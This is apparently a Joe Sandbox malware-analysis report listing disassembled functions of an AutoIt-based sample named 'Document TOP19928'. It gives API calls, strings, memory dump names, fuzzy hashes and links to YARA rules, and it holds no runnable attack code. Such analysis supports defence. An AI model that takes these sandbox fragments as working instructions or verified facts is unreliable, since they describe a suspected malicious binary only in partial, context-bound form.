Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a534a2ce476d5258d0153bfe1e4c1a37778bf69cd51b9d75ed4d57a094a2713b
Instruction ID: 1afc257705bad995a0a072b495c9d3b8f00616fcd71bf1ced68e77cbcd36864d
Opcode Fuzzy Hash: a534a2ce476d5258d0153bfe1e4c1a37778bf69cd51b9d75ed4d57a094a2713b
Instruction Fuzzy Hash: 7F515872418745DBD320AF10D88ABABBBF8FF84310F42885DF2D9511A5DB348969CB16

Function 008399BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 007D506B: __fread_nolock.LIBCMT ref: 007D5089

_wcscmp.LIBCMT ref: 00839AAE
_wcscmp.LIBCMT ref: 00839AC1

Strings

FILE, xrefs: 008399FA

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 5159355a21ef5ac2b9dc7c1e76d82056aa8dbdff38f00534527ee52fe61a6d90
Instruction ID: 61181efcd4949b9da3544649f84dc191c9915ac541d868d1c0e8bdafa131e575
Opcode Fuzzy Hash: 5159355a21ef5ac2b9dc7c1e76d82056aa8dbdff38f00534527ee52fe61a6d90
Instruction Fuzzy Hash: 8241CA71A00619BBDF209AA4DC85FEFBBBDEF85714F00047AF940F7281D6B59A0487A1

Function 00842882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00842892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008428C8

Strings

|, xrefs: 00842899

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 0433907dfa3e6726f447f8528d9f53ff646b0e3eb387cb13949049544517f784
Instruction ID: 2bdd5b9999732c20e152772fa784696c1825532533f6389977d4e22f96518bf4
Opcode Fuzzy Hash: 0433907dfa3e6726f447f8528d9f53ff646b0e3eb387cb13949049544517f784
Instruction Fuzzy Hash: FF311C7180411DEFCF059FA1CC89EEEBFB9FF08340F10402AF915A6266EA355956DB60

Function 00856CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00856D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00856DC2

Strings

static, xrefs: 00856D22

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 741f0c3fb8b04dd611c6ef2ae31da10cad2d6e9192250a8c8a3bb79a2046ba83
Instruction ID: ed63707daf57216542feea6f5c8fdfc14b36a5906a4540c0146373a6f69a06ec
Opcode Fuzzy Hash: 741f0c3fb8b04dd611c6ef2ae31da10cad2d6e9192250a8c8a3bb79a2046ba83
Instruction Fuzzy Hash: F6319E71200604AADB109F68CC80AFB77B9FF48761F508619FDA5D7190EB35AC95CB60

Function 00832D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00832E3B

Strings

0, xrefs: 00832DF9

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: e8652ea6b107b2687524de318df9fa24fd1d0e4c868721a72e682286b0de96bf
Instruction ID: d1f8a65aca6d8b1eb0a68c3c89f2c087a30f4e250dc972b4ae615810ce7ce91b
Opcode Fuzzy Hash: e8652ea6b107b2687524de318df9fa24fd1d0e4c868721a72e682286b0de96bf
Instruction Fuzzy Hash: 3831FD31600309EBDB24DF98C8467AE7BF5FF85350F140069E985D71A2E7749944CB90

Function 00856943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008569D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008569DB

Strings

Combobox, xrefs: 0085699D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: e741209dfa1aa3d5572f367dd00319b7275bcb3c3a86d6b466a60003e180d1d3
Instruction ID: 6fa485be9715602f9fe0c6f42a2bc16a3056b67236045e9d989d907014c9c04b
Opcode Fuzzy Hash: e741209dfa1aa3d5572f367dd00319b7275bcb3c3a86d6b466a60003e180d1d3
Instruction Fuzzy Hash: C511E2713002087FEF119E24CC80EBB3BAAFB993A5F540125FD58D7290E6359C6587A0

Function 00856E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91

GetWindowRect.USER32(00000000,?), ref: 00856EE0
GetSysColor.USER32(00000012), ref: 00856EFA

Strings

static, xrefs: 00856EBD

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 8bf5286a38da019383397ea66e5cc606395bb8e08d518f45e8de226bd17f635e
Instruction ID: fec273fa70aa87c928621ab02fa08b7ea560279c0623b0184f5fd162279dc03c
Opcode Fuzzy Hash: 8bf5286a38da019383397ea66e5cc606395bb8e08d518f45e8de226bd17f635e
Instruction Fuzzy Hash: 08215972A10209AFDB04DFA8CD45AFA7BB8FB08355F044629FD55D3250E734E8659B50

Function 00856B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00856C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00856C20

Strings

edit, xrefs: 00856BF5

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: d4142257d89fcbf1b76111ae7bc06a0ecdb918f173f3e895c68ba4833d2d8e4f
Instruction ID: c0f74cfbb60a0b84528ed8a5fe3bb06530e1a16565bf89bb60340180289a9636
Opcode Fuzzy Hash: d4142257d89fcbf1b76111ae7bc06a0ecdb918f173f3e895c68ba4833d2d8e4f
Instruction Fuzzy Hash: A2119D71500208ABEB108E649C41AAB376AFB1437AF904724FE60D71E0E735DCA89B61

Function 00832E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00832F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00832F30

Strings

0, xrefs: 00832F07

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: c925d1ee5cff7790aaca99d17b435c427a5bd4adeb938d682979c3459870efd2
Instruction ID: 82fb41ac2bfe7f41d0fe73b2b01906761583ff2e32fe82f4eb0e1f6d061cef74
Opcode Fuzzy Hash: c925d1ee5cff7790aaca99d17b435c427a5bd4adeb938d682979c3459870efd2
Instruction Fuzzy Hash: 4311C431901228ABDB31EB58DC45BA977B9FB85354F1800B6E954F72A1EBB0EE04C7D1

Function 008424CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00842520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00842549

Strings

<local>, xrefs: 00842511

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: bc0e06345c084a23a4911d7a067a45d37f7d9dea251f14ce2b150c015fc339aa
Instruction ID: 307daef4f49a198160a7671daa9cc18faa4f02f1ae5db2998adcef138b5e8db1
Opcode Fuzzy Hash: bc0e06345c084a23a4911d7a067a45d37f7d9dea251f14ce2b150c015fc339aa
Instruction Fuzzy Hash: C211027050922DBADB249F518C98EBBFF68FF06355F50812AF905C3040D2B46980DAF0

Function 008480A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0084830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008480C8,?,00000000,?,?), ref: 00848322

inet_addr.WS2_32(00000000), ref: 008480CB
htons.WS2_32(00000000), ref: 00848108

Strings

255.255.255.255, xrefs: 008480E3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 0b7060087ff1bcc6797de2e095469f397a469d8170a99cdef4e7afe45a472516
Instruction ID: 666f2935da1c8148d3ca2f1577ec2fbbac67e96a8670b935855b452c3e275161
Opcode Fuzzy Hash: 0b7060087ff1bcc6797de2e095469f397a469d8170a99cdef4e7afe45a472516
Instruction Fuzzy Hash: 80118E34600319EBDB20AFA8DC46FADB774FF04320F108527EA11D7292DB72A8158695

Function 008292E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00829355

Strings

ComboBox, xrefs: 008292F4
ListBox, xrefs: 0082931F

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 7d3ba028f89bc4073a6aefa4eda55b83360cf25def11182cac7b71e04598eec2
Instruction ID: 30598f20a981746d3c85350eb6e59b157eac8571ab2daa329a8e7a449968272b
Opcode Fuzzy Hash: 7d3ba028f89bc4073a6aefa4eda55b83360cf25def11182cac7b71e04598eec2
Instruction Fuzzy Hash: 1C01D271A01228ABCB04EB64CC96CFE7769FF06320B140619F872973D1EB355848C650

Function 008291DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0082924D

Strings

ComboBox, xrefs: 008291EC
ListBox, xrefs: 00829217

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: d0e12a6a01ebc445821d47db2a88b7481bf372bd15d609ed655f650b41e18788
Instruction ID: 1cb2d0198ef5fccd1d20f248f3722f15d9ff64dd92ecfcaf850f3d9650e084cb
Opcode Fuzzy Hash: d0e12a6a01ebc445821d47db2a88b7481bf372bd15d609ed655f650b41e18788
Instruction Fuzzy Hash: 0801D871A41118B7CB19E7A0D996EFF77A8EF45300F140115B962A3281EA145E0C8261

Function 00829264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 008292D0

Strings

ComboBox, xrefs: 00829271
ListBox, xrefs: 0082929C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: cb13319ed34450f71f0c814ea3a35b5d9c63bca627871ad10f0fdc5359d6d833
Instruction ID: 1de7ba59d8a18a50579bcc31361131a1bf5b5a093d37bf90159f16c0ab0f29c4
Opcode Fuzzy Hash: cb13319ed34450f71f0c814ea3a35b5d9c63bca627871ad10f0fdc5359d6d833
Instruction Fuzzy Hash: BF01A771A41119F7CB15E7A4D986EFF77ACEF11300F240116B962A3282DA155E489271

Function 008351CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 008351E8
_wcscmp.LIBCMT ref: 008351FA

Strings

#32770, xrefs: 008351F4

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: db833bf5446ccb59ef2c3ce79bd4908189157755d96fa4d768a662b04099a3e5
Instruction ID: ab1add8a86e954dc0226c79cd42c988fd45ad75fea259926d22a8db88b6746e9
Opcode Fuzzy Hash: db833bf5446ccb59ef2c3ce79bd4908189157755d96fa4d768a662b04099a3e5
Instruction Fuzzy Hash: 95E06832A0032C2BE320AA99AC49FA7F7ACFB45731F00006BFE10D3140E6649A048BE0

Function 008281BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008281CA

Part of subcall function 007F3598: _doexit.LIBCMT ref: 007F35A2

Strings

AutoIt, xrefs: 008281BE
Error allocating memory., xrefs: 008281C3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: b4123d1de7c498e94524bc1a93dd444ed5eff676ace062ae29dba694f79721dc
Instruction ID: 16da7a2c53ddd170abaef5586337932e47db1a57b60ba165845bd116bb884a91
Opcode Fuzzy Hash: b4123d1de7c498e94524bc1a93dd444ed5eff676ace062ae29dba694f79721dc
Instruction Fuzzy Hash: 19D01232385318B2D61432A46C0EFDA75889B15B52F044016BB08956D38DD9559142D9

Function 0080B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0080B564: _memset.LIBCMT ref: 0080B571

Part of subcall function 007F0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00895158,00000000,00895144,0080B540,?,?,?,007D100A), ref: 007F0B89

IsDebuggerPresent.KERNEL32(?,?,?,007D100A), ref: 0080B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007D100A), ref: 0080B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0080B54E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
